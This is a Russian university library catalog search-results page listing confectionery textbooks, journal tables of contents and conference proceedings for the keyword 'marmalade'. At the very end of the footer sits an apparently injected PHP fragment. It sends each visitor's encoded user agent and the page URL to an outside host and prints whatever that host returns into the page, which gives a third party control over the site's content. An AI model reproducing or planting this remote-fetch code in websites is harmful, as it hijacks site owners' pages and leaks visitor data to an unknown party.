Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

148 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАРМЕЛАД")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 18
1. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

2. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
3. 
Лурье И. С. Технология кондитерского производства [Текст] / И. С. Лурье, 1992. - 399 с.
Держатели документа (Информация об экземплярах) 
4. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2004. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

5. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2006. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

6. 
Пищевая промышленность. - Журнал, 2010г. № 1
Оглавление 
  • Скрынник, Е. Б. Основные направления развития пищевой и перерабатывающей промышленности на среднесрочную перспективу / Е. Б. Скрынник. - с.4-9
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ
  • Казакова, Е. В. Защитное съедобное покрытие на основе белков / Е. В. Казакова, Л. С. Кузнецова. - с.16-18
    Кл. слова: УПАКОВКА СЪЕДОБНАЯ, ПОКРЫТИЕ СЪЕДОБНОЕ
  • Калошин, Ю. А. Новая классификация фасовочных устройств / Ю. А. Калошин, С. М. Шамшурко. - с.20-21
    Кл. слова: УСТРОЙСТВО фасовочное, ФАСОВКА, ДОЗАТОР жидкости
  • Федотова, О. Б. "Активная упаковка" из полимерных материалов / О. Б. Федотова, Д. М. Мяленко, А. В. Шалаева. - с.22-23
    Кл. слова: ПОЛИМЕР, УПАКОВКА, ПЛЕНКА полиэтиленовая
  • Вельтищев, В. Н. Установка для промывания колпачков / В. Н. Вельтищев, Ю. А. Калошин, С. Г. Токарева. - с.24
  • Гадлгареева, Р. Р. Транспортная логистика как элемент системы качества на предприятиях общественного питания / Р. Р. Гадлгареева, В. В. Касаткин, А. Г. Ларионова. - с.26
    Кл. слова: ЛОГИСТИКА ТРАНСПОРТНАЯ, ПЕРЕВОЗКА ТОВАРА, ПИТАНИЕ ОБЩЕСТВЕННОЕ - ЛОГИСТИКА
  • Пивоваров, В. И. Основные направления обеспечения продовольственной безопасности населения / В. И. Пивоваров. - с.35
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Кретов, И. Т. Влияние концентрирования на аминокислотный состав творожной сыворотки / И. Т. Кретов, В. Ю. Овсянников, С. Л. Панченко. - с.44-45
    Кл. слова: СЫВОРОТКА, КОНЦЕНТРИРОВАНИЕ, АМИНОКИСЛОТА
  • Резго, Г. Я. Сохраняемость пищевых продуктов / Г. Я. Резго. - с.46-48
    Кл. слова: УБЫЛЬ ЕСТЕСТВЕННАЯ, ХРАНЕНИЕ ПИЩЕВЫХ ПРОДУКТОВ, ПОТЕРИ ТОВАРНЫЕ
  • Эм, В. Г. Использование плодоовощного сырья в производстве мармелада / В. Г. Эм, А. А. Сапарбекова, У. Ч. Чоманов. - с.50-51
    Кл. слова: МАРМЕЛАД, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Новый полуфабрикат для пищеконцентратной промышленности. - с.51-52
    Кл. слова: КОНЦЕНТРАТ, ПОЛУФАБРИКАТЫ ягодные, ПОЛУФАБРИКАТЫ фруктовые
  • Гладкова, И. А. Молочно-растительная основа для напитков функционального назначения / И. А. Гладкова, М. Е. Успенская, Л. В. Антипова. - с.54-56
    Кл. слова: ЭКСТРАКТ молочно-РАСТИТЕЛЬНЫЙ, АМАРАНТ, БОБЫ нута
  • Австриевских, А. Н. Новые формы концентратов сладких блюд / А. Н. Австриевских, В. В. Бебенин, В. М. Позняковский. - с.56-57
    Кл. слова: КИСЕЛЬ, КОНЦЕНТРАТ
7. 
Хранение и переработка сельхозсырья. - Журнал, 2010г. № 8
Оглавление 
  • Саломатин, В. А. О стратегии развития табачной отрасли в Российской Федерации / В. А. Саломатин. - с.8-10
  • Филатов, В. В. Исследования плотности энергетического облучения на плоской поверхности от инфракрасных излучателей с индивидуальным параболическим отражателем / В. В. Филатов. - с.11-13
  • Исследование форм связи влаги в семенах амаранта сорта Ультра методом дифференциально-термического анализа. - с.14-16
  • Баженова, Б. А. Влияние биохимических изменений в электростимулированной конине на формирование технологических свойств сырья / Б. А. Баженова, Т. М. Бадмаева, Ф. А. Мадагаев. - с.16-19
  • Васильева, И. Г. Эффективность хранения сельскохозяйственных продуктов на объектах общественного питания / И. Г. Васильева. - с.19-21
  • Негматуллоева, Р. Н. Сушка плодов дикорастущего шиповника / Р. Н. Негматуллоева, Г. Н. Дубцова, С. В. Савченко. - с.22-24
  • Забавин, И. С. Исследование диффузионных свойств зерна / И. С. Забавин, С. П. Рудобашта, В. М. Дмитриев. - с.24-28
  • Голубева, Л. В. Влияние комплексной пищевой добавки на качественные показатели белковых продуктов / Л. В. Голубева, Л. Э. Глаголева, Г. М. Смольский. - с.29-31
  • Выродов, Д. А. Визуально-спектрофотометрические методы оценки и сортировки плодов томата на стадии разной степени зрелости / Д. А. Выродов, Е. Д. Жужа. - с.31-37
  • Магомедов, Г. О. Желейный мармелад функционального назначения с ягодами малины и садовой земляники / Г. О. Магомедов, Л. А. Лобосова, И. Х. Арсанукаев. - с.37-39
  • Николаев, Б. Л. Вязкостно-скоростные характеристики яблочной подварки / Б. Л. Николаев, А. Ф. Денисенко, Л. К. Николаев. - с.39
  • Федотова, О. Б. Оценка качества упаковочных материалов для молочных продуктов / О. Б. Федотова, А. Ю. Золотин. - с.40-43
  • Влияние стимулятора биосинтеза этанола - геотермальной воды на морфофизиологические особенности дрожжей Saccharomyces cerevisiae в различных условиях культивирования. - с.44-46
  • Бурмистров, Г. П. Разработка технологии производства специальных продуктов функционального назначения для питания раненых / Г. П. Бурмистров, О. А. Камбаров, О. Ф. Фазуллина. - с.47-49
  • Повышение комплексообразующей способности пектинсодержащих порошковых продуктов. - с.49-51
  • Микробиологические и физико-химические показатели нового диетического продукта самбук яблочный. - с.51-53
  • Изучение кинетики проращивания зернобобовых культур в активированных средах. - с.54-55
  • Технологические аспекты получения железообогащающей пищевой добавки Е381. - с.56-57
  • Внедрение турбокомпрессорных агрегатов Ш2-МБКА в пневмотранспортные системы хлебозаводов. - с.58-61
Держатели документа (Информация об экземплярах) 
8. 
Новости торговли. - Журнал, 2006г. № 8
Оглавление 
  • Рябова, А. Перспектива на вырост / А. Рябова. - с.32-35
    Кл. слова: МАРМЕЛАД - рынок, рынок мармелада
  • Бубенцова, П. Увлечение цветом / П. Бубенцова. - с.43-46
    Кл. слова: СРЕДСТВА МОЮЩИЕ, РЫНОК МОЮЩИХ СРЕДСТВ
  • Козина, Е. Инвестиции в качество / Е. Козина. - с.36-40
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, РЫНОК МАКАРОННЫХ ИЗДЕЛИЙ
  • Бубенцова, П. Управляемая скидка / П. Бубенцова. - с.60-61
    Кл. слова: СКИДКА, БОНУС
9. 
Уоррен Дж. Шотландская кухня [Текст] / Дж. Уоррен ; авт. предисл. В. В. Похлёбкин, 1983. - 73 с.
Держатели документа (Информация об экземплярах) 
10. 
Производство хлеба, хлебобулочных и кондитерских изделий. Торты и пирожные [Текст] / сост. В. А. Шипов, 1999. - 286 с.
Держатели документа (Информация об экземплярах) 
11. 
Наука, образование, бизнес [Текст] : материалы регион. науч.-практ. конф. ученых, преподавателей, аспирантов, студентов, специалистов пром-сти и связи, посвящ. коллегам в честь 50-летия радиотехн. фак. Ом. гос. техн. ун-та / Междунар. акад. наук высш. шк. [и др.], 2011. - 343 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- ОМСК -- КОНФЕРЕНЦИЯ -- РАДИОТЕХНИКА -- РАДИОТЕХНИЧЕСКИЙ -- ФАКУЛЬТЕТ -- СПЕЦИАЛИСТ -- ПОДГОТОВКА -- КАЧЕСТВО -- ВУЗ -- КОРПОРАТИВНЫЙ -- БАКАЛАВРИАТ -- ЭКОНОМИСТ -- МЕНЕДЖЕР -- ПРОФЕССИОНАЛЬНАЯ -- МОБИЛЬНОСТЬ -- МЕТРОЛОГ -- РЕЙТИНГОВАЯ -- СИСТЕМА -- ЗНАНИЕ -- КОНТРОЛЬ -- ЭКОНОМИКА -- ЭКОНОМИЧЕСКАЯ -- ДИСЦИПЛИНА -- ПРЕПОДАВАНИЕ -- ПРОФЕССИОНАЛЬНОЕ -- СТАНОВЛЕНИЕ -- РОССИЯ -- КАЗАХСТАН -- ПОТРЕБИТЕЛЬСКИЙ -- ТОВАР -- БЕЗОПАСНОСТЬ -- ПРОДОВОЛЬСТВЕННАЯ -- ЭНЕРГЕТИЧЕСКИЙ -- НАПИТОК -- РАДИАЦИЯ -- ОБЛУЧЕНИЕ -- ОМСКАЯ ОБЛАСТЬ -- БЕЗАЛКОГОЛЬНЫЙ -- МАРМЕЛАД -- ЧАЙ -- ХОЛОДНЫЙ -- МАСЛО -- СЛИВОЧНОЕ -- ПИЩЕВОЙ -- ПРОДУКТ -- ПРОДОВОЛЬСТВЕННЫЙ -- РЫНОК -- ПРЕДПРИЯТИЕ -- ЭФФЕКТИВНОСТЬ -- УПРАВЛЕНИЕ -- ИННОВАЦИЯ -- ОРГАНИЗАЦИЯ -- ПРОИЗВОДСТВО -- АВТОМАТИЗИРОВАННЫЙ -- ПРОМЫШЛЕННОСТЬ -- ИННОВАЦИОННОЕ -- РАЗВИТИЕ -- КАДРОВАЯ -- ПОЛИТИКА -- ТРУД -- ОПЛАТА -- ГРЕЙДОВАЯ -- СИБИРЬТЕЛЕКОМ -- НТБ -- НАУЧНО-ТЕХНИЧЕСКАЯ -- НАУЧНАЯ -- ТЕХНИЧЕСКАЯ -- БИБЛИОТЕКА -- СПЕЦИАЛИСТ -- РАДИОЗАВОД -- ДИНАМИКА -- ТЕХНИЧЕСКАЯ -- ДОКУМЕНТАЦИЯ -- ОСНАСТКА -- СЕБЕСТОИМОСТЬ -- КАРКАСНО-ШТАМПОВОЧНЫЙ -- КАРКАСНЫЙ -- ШТАМПОВОЧНЫЙ -- ЦЕХ -- СБОРОЧНО-МОНТАЖНОЕ -- СБОРОЧНОЕ -- МОНТАЖНОЕ -- ИСКОМ -- СОЦИАЛЬНАЯ -- ЗАЩИТА -- РАБОТНИК -- ИНСТРУМЕНТАЛЬНОЕ -- ОБЕСПЕЧЕНИЕ -- ПЕНСИОНЕР -- ТРУДОВАЯ -- ЗАНЯТОСТЬ -- СТАБИЛЬНОСТЬ -- НАУКА -- ПРИКЛАДНАЯ -- ФУНДАМЕНТАЛЬНАЯ -- НАУЧНОЕ -- ИССЛЕДОВАНИЕ -- ФИЛЬТР -- СПИРАЛЬНЫЙ -- РЕЗОНАТОР -- АСИНХРОННЫЙ -- ЭЛЕКТРОДВИГАТЕЛЬ -- НАГРУЗКА -- АНТЕННАЯ -- ЗАМЕНА -- СТАЛЬНАЯ -- ОТТЯЖКА -- ИЗОЛЯТОР -- КЕВЛАР -- КЕВЛАРОВАЯ -- НИТЬ -- ЗВУКОВОЕ -- КОЛЕБАНИЕ -- КОЖНЫЙ -- ПОКРОВ -- ЧЕЛОВЕК -- ЭЛЕКТРИЧЕСКОЕ -- СОПРОТИВЛЕНИЕ -- СУ-ДЖОК -- МЕТОД -- РАДИОСВЯЗЬ -- ТРАНКИНГОВАЯ -- КАЧЕСТВЕННАЯ -- ХАРАКТЕРИСТИКА -- IP-СЕТЬ -- N-УЗЕЛ -- ПЕЛЕНГАЦИЯ -- ФАЗОВАЯ -- РАДИОТЕХНИЧЕСКИЙ -- ПАРАМЕТР -- РАДИОПРОЗРАЧНЫЙ -- ОБТЕКАТЕЛЬ -- ЛЕТАТЕЛЬНЫЙ -- АППАРАТ -- ЭНТРОПИЯ -- ЗАКОН -- АРКСИНУС -- РАДИОИМПУЛЬС -- ЛИНЕЙНАЯ -- ЧАСТОТНАЯ -- МОДУЛЯЦИЯ -- ПАВ -- ГЕНЕРАТОР -- ТЕРМОКОМПЕНСИРОВАННЫЙ -- ДУПЛЕКСНАЯ -- ТЕЛЕФОННАЯ -- СВЯЗЬ -- ПАССИВНАЯ -- ЛОКАЦИЯ -- ЭЛЕКТРОПОЕЗД -- ЭЛЕКТРИЧЕСКАЯ -- ЦЕПЬ -- ФУНКЦИОНИРОВАНИЕ -- МОДЕМ -- ВЫСОКОНАДЕЖНЫЙ -- НИЗКОСКОРОСТНОЙ -- КВ -- СВЯЗЬ -- КЛАССИФИКАЦИЯ -- СИГНАЛ -- ФУНКЦИОНАЛЬНЫЙ -- ПРЯМАЯ -- УСИЛИТЕЛЬ -- ПРОЕКТИРОВАНИЕ -- СВЕТОВОЙ -- СБОР -- ОБРАБОТКА -- ДАННОЕ -- ДВУХКАНАЛЬНАЯ -- ПЕЧАТНАЯ -- ПЛАТА -- ДЕФЕКТ -- ЦЕЛОСТНОСТЬ -- МЕРЦАЮЩИЙ -- КОНТАКТ -- ДИАГНОСТИРОВАНИЕ -- ТЭД -- НЕИСПРАВНОСТЬ -- ГАЗОВЫЙ -- РАЗРЯД -- АКТИВНАЯ -- ТОЧКА -- ТЕМПЕРАТУРНАЯ -- ИНТЕГРАЛЬНЫЙ -- ТЕРМОКОМПЕНСИРОВАННЫЙ -- СТАТИСТИЧЕСКИЙ -- АНАЛИЗ -- ДИАГНОСТИЧЕСКИЙ -- ПРИЗНАК -- ЗАЩИТА -- ИНФОРМАЦИЯ -- РАСПРЕДЕЛЕННАЯ -- СЕТЬ -- РАДИОАППАРАТУРА -- АКУСТОЭЛЕКТРОННЫЙ -- ШИРОКОПОЛОСНЫЙ -- ПРЕОБРАЗОВАТЕЛЬ -- УЗКОПОЛОСНЫЙ -- ИСТОЧНИК -- ПИТАНИЕ -- ВТОРИЧНЫЙ -- РЭА -- РАСПРОСТРАНЕНИЕ -- МОДЕЛИРОВАНИЕ -- ОПТИЧЕСКОЕ -- ВОЛОКНО -- ЭФФЕКТ -- НЕЛИНЕЙНЫЙ -- VERILOG -- ЯЗЫК -- СИНТЕЗАБЕЛЬНОСТЬ -- КОНСТРУКЦИЯ -- ТУННЕЛЬНЫЙ -- ДИОД -- КАНАЛ -- ДИСКРЕТНЫЙ -- ИНФОРМАЦИОННЫЙ -- ХАРАКТЕРИСТИЧЕСКАЯ -- ФУНКЦИЯ -- ДИАГНОСТИКА -- ГИДРОУДАР -- ТОК -- ПОТРЕБЛЕНИЕ -- ЭЛЕКТРОДВИГАТЕЛЬ -- ПОЛОСОВЫЙ -- СВЧ -- ДИАПАЗОН -- НЕИСПРАВНОСТЬ -- МОТОРВАГОННЫЙ -- ПОДВИЖНОЙ -- СОСТАВ -- СЛЕЖЕНИЕ -- АВТОМАТИЧЕСКОЕ -- СТЕНД -- ЛАБОРАТОРНЫЙ -- ТРАНКИНГОВАЯ -- ГКМ-ДКМ -- ДКМ -- МОБИЛЬНАЯ -- БАЗОВАЯ -- СТАНЦИЯ -- НИРС -- КОРПОРАТИВНАЯ -- IP-ТЕЛЕФОНИЯ -- ТОЧЕЧНАЯ -- СВАРКА -- ШИРОКОПОЛОСНОЕ -- ВЫСОКОЧАСТОТНОЕ -- УСТРОЙСТВО -- ВИДЕОНАБЛЮДЕНИЕ -- НАВИГАЦИЯ -- GPS -- МЕТРОЛОГИЧЕСКАЯ -- АТТЕСТАЦИЯ -- РЕНТГЕНОВСКИЙ -- СНИМОК -- РАСШИФРОВКА -- КОНТРОЛЬ -- КАБЕЛЬНОЕ -- ТЕЛЕВИДЕНИЕ -- СТЕРЕОТЕЛЕВИДЕНИЕ -- ТРУБОПРОВОД -- ИЗОЛЯЦИОННОЕ -- ПОКРЫТИЕ -- ЧМ -- ЦИФРОВОЙ -- ПРИЕМ -- ЦИФРОВАЯ -- АТС -- ДОЗИМЕТР -- СКОРОСТЬ -- ДВИЖЕНИЕ -- ОБЪЕКТ -- ОММЕТР -- РЕЗЕРВУАР -- ШАРОВОЙ -- ВЕЩЕСТВО -- ТЕКУЧЕЕ -- ДЕФОРМАЦИЯ -- НАПРЯЖЕНИЕ -- ЖИР -- РЫБИЙ -- ВАГОН -- ДРОБЕСТРУЙНАЯ -- ОЧИСТКА -- ЦИФРОВОЙ -- КОММУТАТОР -- ЧИСЛЕННЫЙ -- НЕЛИНЕЙНЫЙ -- ЭФФЕКТ -- ОПТИЧЕСКОЕ -- ВОЛОКНО -- АВТОНОМНЫЙ -- ИСТОЧНИК -- ЭЛЕКТРИЧЕСКИЙ -- ПОДЖИГ -- БЫТОВОЙ -- ГАЗОВЫЙ -- ПРИБОР -- АВТОМАТИЗИРОВАННАЯ -- ВЫХОДНОЙ -- ЦТККГ -- ШУМ -- ПРЕОБРАЗОВАТЕЛЬ -- ЦИФРО-АНАЛОГОВЫЙ -- ЦИФРОВОЙ -- АНАЛОГОВЫЙ -- ГЕНЕРАТОР -- КВАРЦЕВЫЙ -- СЧЕТЧИК -- ГАЗ -- СГ-2 -- СПЕКТРАЛЬНАЯ -- ПИРОМЕТРИЯ -- ЛИНЕЙНЫЙ -- ТРАКТ -- РАДИОПРИЕМНИК -- ТЕЛЕВИЗИОННАЯ -- ПРОГРАММА -- ШИФРОВАНИЕ -- ЧАСТОТОМЕР -- PIC-КОНТРОЛЛЕР -- КУКУРУЗНОЕ -- НЕЛИНЕЙНЫЙ -- ЭФФЕКТ -- РАСПРОСТРАНЕНИЕ -- МЕТАЛЛОИСКАТЕЛЬ -- РАДИОСТАНЦИЯ -- АЗИД-5ЦМЕ -- МОЩНОСТЬ -- УСИЛИТЕЛЬ -- ПРЕСЕЛЕКТОР -- ПРИЕМНИК -- УКВ-ДИАПАЗОН -- МАЛЮТКА -- МАЛЮТКА Ц -- СГ-1 -- ЗАМЫКАНИЕ -- ЛИНИЯ -- ЭЛЕКТРОПЕРЕДАЧА -- МЕТАЛЛИЧЕСКИЙ -- КОЖУХ -- ВИДЕОКАМЕРА -- КВАРЦЕВЫЙ -- ШУМОВОЕ -- СВОЙСТВО -- MICROWAVE OFFICE -- ШИРОКОПОЛОСНОЕ -- СОГЛАСУЮЩЕЕ -- УСТРОЙСТВО -- VERILOG -- ЛИНЕАРИЗАЦИЯ -- ЛЬНЯНОЕ -- МПК -- ЭЛЕКТРИЧЕСКИЙ -- ПРОВЕРКА -- ПЕРЕХОД -- ТЕЛЕВИДЕНИЕ -- АНАЛОГОВОЕ -- ЦИФРОВОЕ -- РЕЧЕВОЕ -- СООБЩЕНИЕ -- ВИДЕОНАБЛЮДЕНИЕ
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
12. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

13. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.
14. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
15. 
Сборник основных рецептур сахаристых кондитерских изделий [Текст] : сборник / Сост. Н. С. Павлова, 2003. - 230 с.
Держатели документа (Информация об экземплярах) 
16. 
Драгилев А. И. Технология кондитерских изделий [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / А. И. Драгилев, И. С. Лурье, 2003. - 429 с.
Держатели документа (Информация об экземплярах) 
17. 
Скобельская З. Г. Технология производства сахарных кондитерских изделий [Текст] : Учеб. для учреждений нач. проф. образования / З. Г. Скобельская, Г. Н. Горячева, 2002. - 412 с.
Держатели документа (Информация об экземплярах) 
18. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2996 - 23.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.58 с.18 запросов, 1.09c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;